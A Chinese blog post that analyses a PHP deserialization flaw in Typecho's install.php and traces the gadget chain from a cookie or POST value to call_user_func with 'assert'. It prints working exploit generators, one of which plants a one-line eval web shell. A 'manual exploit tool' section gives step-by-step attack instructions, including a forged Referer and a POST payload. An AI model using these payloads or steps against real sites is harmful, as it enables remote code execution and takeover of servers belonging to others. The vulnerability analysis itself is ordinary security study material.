前一阵子,typecho爆出了一个反序列化漏洞。在此居正给大家整理了一些相关资料,供大家参考学习。
漏洞分析
源码地址 https://github.com/pupiles/vulcms
测试环境Seay源代码审计系统 + PHP5.4 + firefox
漏洞url
|
http://localhost/typecho/install.php
|
漏洞细节
首先我们直接切入漏洞存在的文件install.php
59行
|
if (!isset($_GET[‘finish’]) && file_exists(__TYPECHO_ROOT_DIR__ . ‘/config.inc.php’) && empty($_SESSION[‘typecho’])) {
exit;
}
// 挡掉可能的跨站请求
if (!empty($_GET) || !empty($_POST)) {
if (empty($_SERVER[‘HTTP_REFERER’])) {
exit;
}
$parts = parse_url($_SERVER[‘HTTP_REFERER’]);
if (!empty($parts[‘port’])) {
$parts[‘host’] = “{$parts[‘host’]}:{$parts[‘port’]}”;
}
if (empty($parts[‘host’]) || $_SERVER[‘HTTP_HOST’] != $parts[‘host’]) {
exit;
}
}
|
这里比较容易绕过,finish参数不能为空,然后refer必须是本站
230行
|
else :
$config = unserialize(base64_decode(Typecho_Cookie::get(‘__typecho_config’)));
Typecho_Cookie::delete(‘__typecho_config’);
$db = new Typecho_Db($config[‘adapter’], $config[‘prefix’]);
$db->addServer($config, Typecho_Db::READ | Typecho_Db::WRITE);
Typecho_Db::set($db);
|
这里注意一下
|
$config = unserialize(base64_decode(Typecho_Cookie::get(‘__typecho_config’)));
|
这里如果我们的Typecho_Cookie::get('__typecho_config')的可控的话,那么就可能存在反序列化漏洞,跟进Typecho_Cookie类下的get方法看看。
|
public static function get($key, $default = NULL)
{
$key = self::$_prefix . $key;
$value = isset($_COOKIE[$key]) ? $_COOKIE[$key] : (isset($_POST[$key]) ? $_POST[$key] : $default);
return is_array($value) ? $default : $value;
}
|
这里的逻辑是先判断存不存在$_COOKIE,如果不存在就直接从$_POST中取,不管是哪种情况我们都可以控制了反序列化内容。跳回去我们继续看
|
$db = new Typecho_Db($config[‘adapter’], $config[‘prefix’]);
|
这里实例化了Typecho_Db,同样拐进去看一下这个类的__construct魔法方法
|
public function __construct($adapterName, $prefix = ‘typecho_’)
{
/** 获取适配器名称 */
$this->_adapterName = $adapterName;
/** 数据库适配器 */
$adapterName = ‘Typecho_Db_Adapter_’ . $adapterName;
if (!call_user_func(array($adapterName, ‘isAvailable’))) {
throw new Typecho_Db_Exception(“Adapter {$adapterName} is not available”);
}
$this->_prefix = $prefix;
/** 初始化内部变量 */
$this->_pool = array();
$this->_connectedPool = array();
$this->_config = array();
//实例化适配器对象
$this->_adapter = new $adapterName();
}
|
这时候我们的关键漏洞代码就出现了
|
$adapterName = ‘Typecho_Db_Adapter_’ . $adapterName;
|
这里是把$adapterName进行了字符串拼接,这个$adapterName是我们可控的变量类型,我们知道当一个类被直接当成字符串的时候会调用__toString魔法方法,所以我们这时候只要全局搜索一下__toString方法即可。
一番搜索后我们来到Feed.php这里__toString方法太长了,我在这里只截取关键部分代码
|
public function __toString()
{
$result = ‘<?xml version=”1.0″ encoding=”‘ . $this->_charset . ‘”?>’ . self::EOL;
…
…
…
foreach ($this->_items as $item) {
$content .= ‘<item>’ . self::EOL;
$content .= ‘<title>’ . htmlspecialchars($item[‘title’]) . ‘</title>’ . self::EOL;
$content .= ‘<link>’ . $item[‘link’] . ‘</link>’ . self::EOL;
$content .= ‘<guid>’ . $item[‘link’] . ‘</guid>’ . self::EOL;
$content .= ‘<pubDate>’ . $this->dateFormat($item[‘date’]) . ‘</pubDate>’ . self::EOL;
$content .= ‘<dc:creator>’ . htmlspecialchars($item[‘author’]->screenName) . ‘</dc:creator>’ . self::EOL;
|
这里我们可以看一下关键部分
|
$content .= ‘<dc:creator>’ . htmlspecialchars($item[‘author’]->screenName) . ‘</dc:creator>’ . self::EOL;
|
这里我们获取了$item['author']->screenName,这里有个php反序列化的知识点,当我们试图去访问一个对象的不存在或者私有属性的时候会触发__get魔法方法。所以这里如果我们的$item['author']是一个对象,且该对象没有screenName属性,那么我们就可以利用__get方法,那么思路又清晰了,全局搜索__get方法。
找到Request.php
找到目标方法
|
public function __get($key)
{
return $this->get($key);
}
|
跟进get方法
|
public function get($key, $default = NULL)
{
switch (true) {
case isset($this->_params[$key]):
$value = $this->_params[$key];
break;
case isset(self::$_httpParams[$key]):
$value = self::$_httpParams[$key];
break;
default:
$value = $default;
break;
}
$value = !is_array($value) && strlen($value) > 0 ? $value : $default;
return $this->_applyFilter($value);
}
|
这里又调用了_applyFilter方法
|
private function _applyFilter($value)
{
if ($this->_filter) {
foreach ($this->_filter as $filter) {
$value = is_array($value) ? array_map($filter, $value) :
call_user_func($filter, $value);
}
$this->_filter = array();
}
return $value;
}
|
这里熟悉php的小伙伴肯定一眼就看出来了call_user_func命令执行,而$filter和$value都是我们可控的。照着这个逻辑我们来尝试写一下exp。
exp
|
class Typecho_Feed
{
const RSS2 = ‘RSS 2.0’;
private $_type;
private $_items;
private $_charset;
public function __construct(){
$this->_type = $this::RSS2;
$this->_items[0] = array(
‘author’ => new Typecho_Request(),
);
}
}
class Typecho_Request
{
private $_params = array();
private $_filter = array();
public function __construct(){
$this->_params[‘screenName’] = ‘phpinfo()’;
$this->_filter[0] = ‘assert’;
}
}
$exp = array(
‘adapter’ => new Typecho_Feed(),
‘prefix’ => ‘_pupiles’
);
echo base64_encode(serialize($exp));
|
然而写完这个exp怎么打都是返回服务器500,晕倒爆炸,后来看了Loy师傅的文章,才知道原来是ob_start原因。
这里开启了ob_start的话会让脚本没有回显,同时我们的exp会触发自有的exception,我们看看触发exception会出现什么后果
|
public static function exceptionHandle($exception)
{
if (defined(‘__TYPECHO_DEBUG__’)) {
echo ‘<pre><code>’;
echo ‘<h1>’ . htmlspecialchars($exception->getMessage()) . ‘</h1>’;
echo htmlspecialchars($exception->__toString());
echo ‘</code></pre>’;
} else {
@ob_end_clean();
if (404 == $exception->getCode() && !empty(self::$exceptionHandle)) {
$handleClass = self::$exceptionHandle;
new $handleClass($exception);
} else {
self::error($exception);
}
}
exit;
}
|
调用了ob_end_clean方法清空了缓冲区,所以我们的phpinfo没有显示出来,不过php还是执行的,这就意味这我们可以修改以上代码
|
class Typecho_Request
{
private $_params = array();
private $_filter = array();
public function __construct(){
$this->_params[‘screenName’] = “file_put_contents(‘pupiles.php’, ‘<?php @eval($_POST[xdsec]); ?>’)”;
$this->_filter[0] = ‘assert’;
}
}
|
这样虽然没有回显但是我们的php还是成功写入了。
而Loy师傅给出了2种产生回显的解决方案
- 因为 call_user_func 函数处是一个循环,我们可以通过设置数组来控制第二次执行的函数,然后找一处exit跳出,缓冲区中的数据就会被输出出来。
- 第二个办法就是在命令执行之后,想办法造成一个报错,语句报错就会强制停止,这样缓冲区中的数据仍然会被输出出来。
同时给出了他的payload
-
public function __construct(){$this->_type = $this::RSS2;$this->_items[0] = array(‘category’ => array(new Typecho_Request()),‘author’ => new Typecho_Request(),);}
加了一行
|
‘category’ => array(new Typecho_Request()),
|
我们回到代码中引入category变量的地方
|
if (!empty($item[‘category’]) && is_array($item[‘category’])) {
foreach ($item[‘category’] as $category) {
$content .= ‘<category><![CDATA[‘ . $category[‘name’] . ‘]]></category>’ . self::EOL;
}
}
|
这里如果我们把一个任意类的对象封装成一个数组传给category的时候其实就是变相构造了一个报错,使其无法正常的执行ob_end_clean()。
好啦,分析完刚好一点,上床睡觉美滋滋,迎接美好(累成狗)的周末
PS(其实我还是不知道这个原生的exception是如何触发的,如果有知道的师傅麻烦留个言谢谢)
转载自:http://pupiles.com/typecho.html
利用工具(手动版)
Exploit如下:
<?php
class Typecho_Feed
{
const RSS1 = 'RSS 1.0';
const RSS2 = 'RSS 2.0';
const ATOM1 = 'ATOM 1.0';
const DATE_RFC822 = 'r';
const DATE_W3CDTF = 'c';
const EOL = "\n";
private $_type;
private $_items;
public function __construct(){
$this->_type = $this::RSS2;
$this->_items[0] = array(
'title' => '1',
'link' => '1',
'date' => 1508895132,
'category' => array(new Typecho_Request()),
'author' => new Typecho_Request(),
);
}
}
class Typecho_Request
{
private $_params = array();
private $_filter = array();
public function __construct(){
$this->_params['screenName'] = 'phpinfo()';//提示:此处可以改成要运行的任意脚本,比如用file_puts_content函数输出一个一句话木马
$this->_filter[0] = 'assert';
}
}
$exp = array(
'adapter' => new Typecho_Feed(),
'prefix' => 'typecho_'
);
echo base64_encode(serialize($exp));
然后运行该php,使用输出的payload访问:
提示:借助火狐的扩展New Hackbar,访问http://网站/install.php?finish=aa,post data中输入“__typecho_config=”+脚本生成的字符串。referer改成“http://网站/”,然后run。
利用工具(GUI版)
链接:http://www.freebuf.com/sectool/152889.html
2条评论
这该不会是Typecho1.1的漏洞吧?
十月份的漏洞,升级到最新版本就没问题了